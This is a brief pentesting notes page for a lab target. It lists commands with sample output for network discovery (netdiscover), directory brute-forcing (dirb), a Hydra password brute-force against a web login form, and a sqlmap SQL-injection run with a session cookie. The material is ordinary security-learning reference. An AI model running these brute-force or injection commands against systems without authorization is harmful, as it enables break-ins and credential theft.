Pentesting

Pentesting is an authorized simulated attack on a computer system, performed to evaluate the security of the system.

Useful Commands

Searching a range of IP Address

root@kali:~# netdiscover -i eth2 -r 192.168.0.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.0.1     f8:1a:67:5a:fe:24      1      60  TP-LINK TECHNOLOGIES CO.,LTD
 192.168.0.100   a8:60:b6:3a:56:ce      2     120  Apple, Inc.
 192.168.0.101   e0:3f:49:14:a9:0d      1      60  Unknown vendor

Useful Tools

DIRB

Searches all the directory contents on a website

Usage

dirb http://192.168.0.104/ /usr/share/wordlists/dirb/big.txt

Resources

gobuster

Directory/file & DNS busting tool written in Go.

Resources

Hydra

Exploiting Username and Password forms.

Usage

hydra 192.168.0.104 http-post-form '/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid password' -L /root/usernames.txt -P /usr/share/wordlists/metasploit/password.lst -vV -t 10 -w 30 -o hydra-http-post-attack.txt

Resources

sqlmap

Used for doing SQL injection stuff.

Usage

When having to log into an PHPSESSIONID auth:

sqlmap -u http://192.168.0.104/imfadministrator/cms.php?pagename=upload --banner --cookie="PHPSESSID=m0i2uapvsqlklug2tpe2a8cis2; security=low" -f

results matching ""

    powered by

    No results matching ""